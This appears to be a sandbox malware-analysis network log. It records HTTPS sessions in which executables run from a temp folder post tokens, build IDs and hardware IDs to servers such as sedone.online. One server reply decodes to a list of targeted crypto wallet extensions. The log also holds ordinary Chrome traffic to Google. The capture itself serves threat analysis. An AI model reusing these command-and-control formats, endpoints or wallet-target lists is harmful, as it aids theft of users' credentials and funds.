2024-12-16 10:03:58 UTC	183	IN	Data Raw: 36 74 5a 78 73 31 4a 45 72 73 69 54 49 76 67 56 68 59 41 39 41 34 33 76 2b 44 73 2f 6a 59 52 4d 63 78 6d 4a 74 66 34 66 43 7a 48 66 39 72 47 44 45 6e 51 75 69 4a 4d 47 37 44 46 6c 67 65 6d 57 69 57 32 49 2b 34 38 4e 70 63 69 43 2f 53 68 78 72 69 2b 2f 64 44 73 43 64 59 63 53 39 57 70 4e 70 34 51 4f 67 74 48 54 71 71 49 49 47 45 6c 2f 7a 2f 31 78 4c 66 62 74 71 42 45 2b 37 7a 39 55 79 7a 62 52 38 36 4a 45 58 67 6a 6a 46 71 79 52 6c 61 48 70 46 6b 6b 73 43 49 76 2f 76 55 58 59 67 6d 6c 73 78 66 34 65 53 7a 48 66 39 43 41 54 6f 6d 53 4b 53 0d 0a Data Ascii: 6tZxs1JErsiTIvgVhYA9A43v+Ds/jYRMcxmJtf4fCzHf9rGDEnQuiJMG7DFlgemWiW2I+48NpciC/Shxri+/dDsCdYcS9WpNp4QOgtHTqqIIGEl/z/1xLfbtqBE+7z9UyzbR86JEXgjjFqyRlaHpFkksCIv/vUXYgmlsxf4eSzHf9CATomSKS
2024-12-16 10:03:58 UTC	1369	IN	Data Raw: 33 63 35 35 0d 0a 64 64 6e 61 50 48 31 4e 62 79 43 43 53 77 34 69 36 2f 64 64 54 67 53 62 54 69 68 76 6e 2b 76 56 47 73 47 4d 54 4d 43 64 4b 36 49 77 79 62 73 34 55 56 42 53 62 5a 64 36 45 7a 72 76 67 6d 77 72 48 48 39 57 55 43 50 62 77 73 31 72 78 66 6c 59 32 4a 41 36 38 77 6a 6c 39 78 52 4a 52 48 70 39 6c 6e 63 57 4a 73 66 37 58 57 49 34 6d 30 49 30 57 39 50 2f 2f 53 37 68 70 47 6a 38 6c 52 4f 65 50 65 43 47 50 48 30 64 62 79 43 43 79 7a 59 4f 53 38 39 64 56 78 7a 47 59 6d 31 2f 68 38 4c 4d 64 2f 32 73 63 50 53 46 4f 37 59 63 77 5a 4d 59 64 58 68 43 56 59 35 6a 48 67 62 58 71 30 56 47 4a 4c 64 71 4f 47 65 66 2f 34 55 32 32 4a 31 68 78 4c 31 61 6b 32 6e 68 4f 77 52 56 4c 48 49 41 67 67 59 53 58 2f 50 2f 58 45 74 39 75 31 59 4d 51 35 66 33 2b 51 37 5a 76 Data Ascii: 3c55ddnaPH1NbyCCSw4i6/ddTgSbTihvn+vVGsGMTMCdK6Iwybs4UVBSbZd6EzrvgmwrHH9WUCPbws1rxflY2JA68wjl9xRJRHp9lncWJsf7XWI4m0I0W9P//S7hpGj8lROePeCGPH0dbyCCyzYOS89dVxzGYm1/h8LMd/2scPSFO7YcwZMYdXhCVY5jHgbXq0VGJLdqOGef/4U22J1hxL1ak2nhOwRVLHIAggYSX/P/XEt9u1YMQ5f3+Q7Zv
2024-12-16 10:03:58 UTC	1369	IN	Data Raw: 44 30 77 69 63 68 31 6c 68 59 46 39 41 34 33 73 36 45 73 2f 7a 63 58 6f 45 72 30 49 38 65 36 66 33 7a 53 72 74 73 48 7a 63 70 51 2b 47 50 50 48 33 46 45 31 41 58 6d 57 79 54 69 73 44 38 2f 38 4d 53 33 32 37 6e 6a 78 48 6f 2b 2b 55 46 6f 43 6b 50 63 53 39 43 70 4e 70 34 62 73 4d 58 58 42 53 54 59 35 2f 41 6e 4b 37 30 30 6c 71 43 49 74 32 4d 47 66 54 36 2f 45 79 38 5a 42 38 32 49 45 4c 75 67 54 38 76 67 56 68 59 41 39 41 34 33 75 6d 5a 72 50 57 62 54 63 6b 33 6c 6f 55 54 70 71 53 7a 54 62 4a 76 48 44 55 76 51 2b 4f 45 4d 58 33 47 48 56 45 62 6c 47 75 52 7a 49 71 2f 2b 4d 6c 55 67 79 62 56 6a 78 4c 6f 2f 2f 63 46 38 53 63 52 4b 57 67 57 70 4c 41 31 59 64 51 58 57 41 71 61 49 49 47 45 6c 2f 7a 2f 31 78 4c 66 62 74 4b 4d 44 65 33 39 2b 45 36 78 59 42 6b 30 49 Data Ascii: D0wich1lhYF9A43s6Es/zcXoEr0I8e6f3zSrtsHzcpQ+GPPH3FE1AXmWyTisD8/8MS327njxHo++UFoCkPcS9CpNp4bsMXXBSTY5/AnK700lqCIt2MGfT6/Ey8ZB82IELugT8vgVhYA9A43umZrPWbTck3loUTpqSzTbJvHDUvQ+OEMX3GHVEblGuRzIq/+MlUgybVjxLo//cF8ScRKWgWpLA1YdQXWAqaIIGEl/z/1xLfbtKMDe39+E6xYBk0I
2024-12-16 10:03:58 UTC	1369	IN	Data Raw: 2b 61 73 55 54 57 52 61 54 5a 70 69 4b 77 50 7a 2f 77 78 4c 66 62 76 61 5a 45 75 72 37 73 31 72 78 66 6c 59 32 4a 41 36 38 77 6a 4e 6a 79 78 39 66 46 70 4e 6f 6d 38 36 45 75 66 6a 54 51 49 38 75 30 5a 41 4e 35 76 58 32 53 62 78 6e 45 6a 63 68 53 4f 65 47 65 43 47 50 48 30 64 62 79 43 43 7a 78 6f 6d 56 2f 38 41 53 6d 47 44 50 77 68 6a 71 76 4b 73 46 76 6d 77 63 50 69 56 4e 34 6f 45 7a 61 73 55 5a 57 42 4f 64 63 70 33 46 67 62 6a 34 31 46 53 42 4c 39 6d 45 47 4f 2f 39 2b 30 4c 2f 4b 56 59 32 4d 41 36 38 77 68 5a 6f 7a 42 77 66 42 4e 35 35 33 73 32 43 2f 4b 43 62 55 6f 30 6b 33 49 77 66 34 65 37 31 54 4c 39 6b 42 44 49 75 52 75 4b 4f 4e 47 4c 48 45 56 38 65 6d 32 32 56 78 34 69 38 38 39 6f 53 79 57 37 52 6d 6c 2b 2b 76 4d 4a 49 73 57 4d 59 4d 6a 68 4a 70 4a Data Ascii: +asUTWRaTZpiKwPz/wxLfbvaZEur7s1rxflY2JA68wjNjyx9fFpNom86EufjTQI8u0ZAN5vX2SbxnEjchSOeGeCGPH0dbyCCzxomV/8ASmGDPwhjqvKsFvmwcPiVN4oEzasUZWBOdcp3Fgbj41FSBL9mEGO/9+0L/KVY2MA68whZozBwfBN553s2C/KCbUo0k3Iwf4e71TL9kBDIuRuKONGLHEV8em22Vx4i889oSyW7Rml++vMJIsWMYMjhJpJ
2024-12-16 10:03:58 UTC	1369	IN	Data Raw: 41 52 38 4e 30 44 6a 4d 68 4d 36 75 75 49 4d 53 77 43 33 45 6b 42 6e 6c 36 76 41 43 67 56 6b 78 4b 79 56 49 38 35 4d 47 55 63 67 43 55 68 32 48 63 64 4c 66 6a 62 4c 32 33 45 54 48 59 4a 61 4e 58 37 37 46 73 77 33 2f 57 46 68 78 4d 41 36 38 77 67 31 73 77 52 5a 59 44 59 45 74 75 64 43 44 75 75 2f 4b 45 73 6c 75 30 4d 4a 48 74 72 4b 7a 51 61 34 6e 54 6d 46 36 46 62 48 52 62 7a 2b 64 42 78 45 43 30 48 62 65 6b 74 7a 79 75 4d 6b 53 33 32 36 52 67 51 33 30 2b 76 42 54 76 43 41 6f 44 77 5a 4a 34 6f 63 2f 66 34 30 32 56 41 2b 58 49 4e 43 4b 67 66 79 67 34 68 4c 50 62 75 6e 4d 58 2f 36 38 71 77 57 4b 5a 42 67 2f 4c 31 6a 31 7a 78 5a 6f 79 52 31 59 43 39 4a 4f 6c 64 36 4a 2f 4c 61 62 56 4d 64 32 68 73 78 66 34 75 32 7a 48 65 38 31 54 57 52 37 47 62 54 51 4a 79 48 Data Ascii: AR8N0DjMhM6uuIMSwC3EkBnl6vACgVkxKyVI85MGUcgCUh2HcdLfjbL23ETHYJaNX77Fsw3/WFhxMA68wg1swRZYDYEtudCDuu/KEslu0MJHtrKzQa4nTmF6FbHRbz+dBxEC0HbektzyuMkS326RgQ30+vBTvCAoDwZJ4oc/f402VA+XINCKgfyg4hLPbunMX/68qwWKZBg/L1j1zxZoyR1YC9JOld6J/LabVMd2hsxf4u2zHe81TWR7GbTQJyH
2024-12-16 10:03:58 UTC	1369	IN	Data Raw: 4c 35 57 76 2f 53 77 71 66 76 56 58 49 41 34 78 38 4a 52 70 76 4f 7a 48 59 59 6e 58 6e 45 58 41 4b 53 61 65 44 65 50 4c 56 77 56 6e 6d 65 49 32 38 4f 62 39 74 78 54 6b 54 37 42 6a 56 44 49 79 74 49 46 38 53 63 51 63 58 41 63 71 73 49 38 66 6f 39 41 44 30 6e 4c 4e 63 32 64 33 75 37 6e 6c 55 76 48 4f 4a 62 61 54 61 69 38 34 51 58 6e 4a 31 45 79 4f 6c 7a 69 67 53 35 73 69 43 5a 68 50 4a 35 6e 6e 39 79 65 73 66 54 36 55 5a 59 6b 36 4c 77 4b 35 66 4c 39 51 71 6c 32 56 6e 39 6f 51 61 54 61 41 53 2b 48 57 47 42 56 30 48 6a 65 6b 73 36 4a 2b 39 56 63 67 44 6a 48 7a 7a 6a 6f 2b 2f 4a 54 72 32 6f 61 45 43 74 66 37 73 4a 32 4c 38 6c 59 42 30 6e 65 49 4a 72 62 7a 75 53 6f 69 51 6e 53 66 59 48 53 54 66 6d 79 36 67 57 70 4a 30 35 6a 5a 67 37 32 77 6d 41 76 69 42 74 4e Data Ascii: L5Wv/SwqfvVXIA4x8JRpvOzHYYnXnEXAKSaeDePLVwVnmeI28Ob9txTkT7BjVDIytIF8ScQcXAcqsI8fo9AD0nLNc2d3u7nlUvHOJbaTai84QXnJ1EyOlzigS5siCZhPJ5nn9yesfT6UZYk6LwK5fL9Qql2Vn9oQaTaAS+HWGBV0Hjeks6J+9VcgDjHzzjo+/JTr2oaECtf7sJ2L8lYB0neIJrbzuSoiQnSfYHSTfmy6gWpJ05jZg72wmAviBtN

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.5	49916	116.203.12.114	443	1084	C:\Users\user\AppData\Local\Temp\1016043001\95bf820dd4.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-16 10:03:58 UTC	325	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----ZU3EUA1VAI5FUA1DJ589 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: sedone.online Content-Length: 332 Connection: Keep-Alive Cache-Control: no-cache
2024-12-16 10:03:58 UTC	332	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 5a 55 33 45 55 41 31 56 41 49 35 46 55 41 31 44 4a 35 38 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 36 32 63 30 31 38 38 32 63 38 32 36 33 39 39 37 35 31 36 66 64 34 62 36 33 36 33 62 38 38 61 0d 0a 2d 2d 2d 2d 2d 2d 5a 55 33 45 55 41 31 56 41 49 35 46 55 41 31 44 4a 35 38 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 5a 55 33 45 55 41 31 56 41 49 35 46 55 41 31 44 4a 35 38 39 0d 0a 43 6f 6e 74 Data Ascii: ------ZU3EUA1VAI5FUA1DJ589Content-Disposition: form-data; name="token"e62c01882c8263997516fd4b6363b88a------ZU3EUA1VAI5FUA1DJ589Content-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------ZU3EUA1VAI5FUA1DJ589Cont
2024-12-16 10:03:58 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 16 Dec 2024 10:03:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-16 10:03:58 UTC	119	IN	Data Raw: 36 63 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 46 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 0d 0a 30 0d 0a 0d 0a Data Ascii: 6cTWV0YU1hc2t8MXx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDF8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb2180

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.5	49923	116.203.12.114	443	1084	C:\Users\user\AppData\Local\Temp\1016043001\95bf820dd4.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-16 10:04:00 UTC	326	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----AS2N7900ZU3EUA1VAI5F User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: sedone.online Content-Length: 6457 Connection: Keep-Alive Cache-Control: no-cache
2024-12-16 10:04:00 UTC	6457	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 41 53 32 4e 37 39 30 30 5a 55 33 45 55 41 31 56 41 49 35 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 36 32 63 30 31 38 38 32 63 38 32 36 33 39 39 37 35 31 36 66 64 34 62 36 33 36 33 62 38 38 61 0d 0a 2d 2d 2d 2d 2d 2d 41 53 32 4e 37 39 30 30 5a 55 33 45 55 41 31 56 41 49 35 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 41 53 32 4e 37 39 30 30 5a 55 33 45 55 41 31 56 41 49 35 46 0d 0a 43 6f 6e 74 Data Ascii: ------AS2N7900ZU3EUA1VAI5FContent-Disposition: form-data; name="token"e62c01882c8263997516fd4b6363b88a------AS2N7900ZU3EUA1VAI5FContent-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------AS2N7900ZU3EUA1VAI5FCont
2024-12-16 10:04:01 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 16 Dec 2024 10:04:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-16 10:04:01 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.5	49924	104.21.50.161	443	6256	C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-16 10:04:00 UTC	277	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=JH4HSQ3C9UR5NY User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 12811 Host: tacitglibbr.biz
2024-12-16 10:04:00 UTC	12811	OUT	Data Raw: 2d 2d 4a 48 34 48 53 51 33 43 39 55 52 35 4e 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 44 42 32 45 45 35 34 38 36 46 32 32 37 37 42 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 4a 48 34 48 53 51 33 43 39 55 52 35 4e 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 4a 48 34 48 53 51 33 43 39 55 52 35 4e 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 4a 48 34 48 53 51 33 43 Data Ascii: --JH4HSQ3C9UR5NYContent-Disposition: form-data; name="hwid"1DB2EE5486F2277BAC8923850305D13E--JH4HSQ3C9UR5NYContent-Disposition: form-data; name="pid"2--JH4HSQ3C9UR5NYContent-Disposition: form-data; name="lid"PsFKDg--pablo--JH4HSQ3C
2024-12-16 10:04:02 UTC	1018	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 10:04:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=jr3kaocj80qo3eh9cf1lo8sqv7; expires=Fri, 11-Apr-2025 03:50:41 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ms3iV1MNjuzxveJi7gbYM04SxYv8umhed9orMgQ%2F3r7dRtN9x76N7WKRKQ4PYJ6E0Rgv%2FFForIBLe77S1NzHnpwpz2fGc%2FMDRgD1skYj3TJZlbp6blswjnOKcxIJmd6%2F3l4%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f2dd8c7e9a2c32c-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1498&min_rtt=1492&rtt_var=572&sent=10&recv=17&lost=0&retrans=0&sent_bytes=2840&recv_bytes=13746&delivery_rate=1891191&cwnd=171&unsent_bytes=0&cid=f7a2d6c093db9db1&ts=1917&x=0"
2024-12-16 10:04:02 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-16 10:04:02 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.5	49928	116.203.12.114	443	1084	C:\Users\user\AppData\Local\Temp\1016043001\95bf820dd4.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-16 10:04:01 UTC	325	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----AS2N7900ZU3EUA1VAI5F User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: sedone.online Content-Length: 489 Connection: Keep-Alive Cache-Control: no-cache
2024-12-16 10:04:01 UTC	489	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 41 53 32 4e 37 39 30 30 5a 55 33 45 55 41 31 56 41 49 35 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 36 32 63 30 31 38 38 32 63 38 32 36 33 39 39 37 35 31 36 66 64 34 62 36 33 36 33 62 38 38 61 0d 0a 2d 2d 2d 2d 2d 2d 41 53 32 4e 37 39 30 30 5a 55 33 45 55 41 31 56 41 49 35 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 41 53 32 4e 37 39 30 30 5a 55 33 45 55 41 31 56 41 49 35 46 0d 0a 43 6f 6e 74 Data Ascii: ------AS2N7900ZU3EUA1VAI5FContent-Disposition: form-data; name="token"e62c01882c8263997516fd4b6363b88a------AS2N7900ZU3EUA1VAI5FContent-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------AS2N7900ZU3EUA1VAI5FCont
2024-12-16 10:04:02 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 16 Dec 2024 10:04:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-16 10:04:02 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.5	49940	172.217.21.36	443	3552	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-16 10:04:05 UTC	615	OUT	GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1 Host: www.google.com Connection: keep-alive X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlKHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc= Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-12-16 10:04:06 UTC	1266	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 10:04:06 GMT Pragma: no-cache Expires: -1 Cache-Control: no-cache, must-revalidate Content-Type: text/javascript; charset=UTF-8 Strict-Transport-Security: max-age=31536000 Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce--pR8D0aGnN3CWdwD_ltWTA' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1 Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]} Accept-CH: Sec-CH-Prefers-Color-Scheme Accept-CH: Sec-CH-UA-Form-Factors Accept-CH: Sec-CH-UA-Platform Accept-CH: Sec-CH-UA-Platform-Version Accept-CH: Sec-CH-UA-Full-Version Accept-CH: Sec-CH-UA-Arch Accept-CH: Sec-CH-UA-Model Accept-CH: Sec-CH-UA-Bitness Accept-CH: Sec-CH-UA-Full-Version-List Accept-CH: Sec-CH-UA-WoW64 Permissions-Policy: unload=() Content-Disposition: attachment; filename="f.txt" Server: gws X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-12-16 10:04:06 UTC	124	IN	Data Raw: 33 33 32 0d 0a 29 5d 7d 27 0a 5b 22 22 2c 5b 22 69 6e 74 65 6c 20 61 72 63 20 62 35 38 30 20 67 72 61 70 68 69 63 73 20 63 61 72 64 22 2c 22 70 6f 6b c3 a9 6d 6f 6e 20 74 63 67 20 70 6f 63 6b 65 74 20 6d 79 74 68 69 63 61 6c 20 69 73 6c 61 6e 64 22 2c 22 63 6f 6e 6e 65 63 74 69 63 75 74 20 73 6e 6f 77 20 66 72 65 65 7a 69 6e 67 20 72 61 69 6e 22 2c 22 75 73 63 20 75 70 Data Ascii: 332)]}'["",["intel arc b580 graphics card","pokmon tcg pocket mythical island","connecticut snow freezing rain","usc up
2024-12-16 10:04:06 UTC	701	IN	Data Raw: 73 74 61 74 65 20 62 61 73 6b 65 74 62 61 6c 6c 20 70 6c 61 79 65 72 20 69 6e 6a 75 72 79 22 2c 22 6d 6f 72 74 67 61 67 65 20 72 65 66 69 6e 61 6e 63 65 20 72 61 74 65 73 22 2c 22 79 65 6c 6c 6f 77 73 74 6f 6e 65 20 73 65 61 73 6f 6e 20 66 69 6e 61 6c 65 20 72 65 63 61 70 22 2c 22 6e 69 6e 74 65 6e 64 6f 20 73 77 69 74 63 68 20 67 61 6d 65 73 22 2c 22 64 65 74 72 6f 69 74 20 6c 69 6f 6e 73 20 76 73 20 62 75 66 66 61 6c 6f 20 62 69 6c 6c 73 22 5d 2c 5b 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 5d 2c 5b 5d 2c 7b 22 67 6f 6f 67 6c 65 3a 63 6c 69 65 6e 74 64 61 74 61 22 3a 7b 22 62 70 63 22 3a 66 61 6c 73 65 2c 22 74 6c 77 22 3a 66 61 6c 73 65 7d 2c 22 67 6f 6f 67 6c 65 3a 67 72 6f 75 70 73 69 6e 66 6f 22 3a 22 43 68 67 49 6b 6b 34 Data Ascii: state basketball player injury","mortgage refinance rates","yellowstone season finale recap","nintendo switch games","detroit lions vs buffalo bills"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4
2024-12-16 10:04:06 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.5	49944	172.217.21.36	443	3552	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-16 10:04:06 UTC	518	OUT	GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1 Host: www.google.com Connection: keep-alive X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlKHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc= Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-12-16 10:04:06 UTC	1018	IN	HTTP/1.1 200 OK Version: 704583840 Content-Type: application/json; charset=UTF-8 X-Content-Type-Options: nosniff Strict-Transport-Security: max-age=31536000 Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]} Accept-CH: Sec-CH-Prefers-Color-Scheme Accept-CH: Sec-CH-UA-Form-Factors Accept-CH: Sec-CH-UA-Platform Accept-CH: Sec-CH-UA-Platform-Version Accept-CH: Sec-CH-UA-Full-Version Accept-CH: Sec-CH-UA-Arch Accept-CH: Sec-CH-UA-Model Accept-CH: Sec-CH-UA-Bitness Accept-CH: Sec-CH-UA-Full-Version-List Accept-CH: Sec-CH-UA-WoW64 Permissions-Policy: unload=() Content-Disposition: attachment; filename="f.txt" Date: Mon, 16 Dec 2024 10:04:06 GMT Server: gws X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-12-16 10:04:06 UTC	372	IN	Data Raw: 32 36 66 63 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 65 6e 2d 55 53 22 2c 22 6f 67 62 22 3a 7b 22 68 74 6d 6c 22 3a 7b 22 70 72 69 76 61 74 65 5f 64 6f 5f 6e 6f 74 5f 61 63 63 65 73 73 5f 6f 72 5f 65 6c 73 65 5f 73 61 66 65 5f 68 74 6d 6c 5f 77 72 61 70 70 65 64 5f 76 61 6c 75 65 22 3a 22 5c 75 30 30 33 63 68 65 61 64 65 72 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 45 61 20 67 62 5f 32 64 20 67 62 5f 51 65 20 67 62 5f 71 64 5c 22 20 69 64 5c 75 30 30 33 64 5c 22 67 62 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 61 6e 6e 65 72 5c 22 20 73 74 79 6c 65 5c 75 30 30 33 64 5c 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 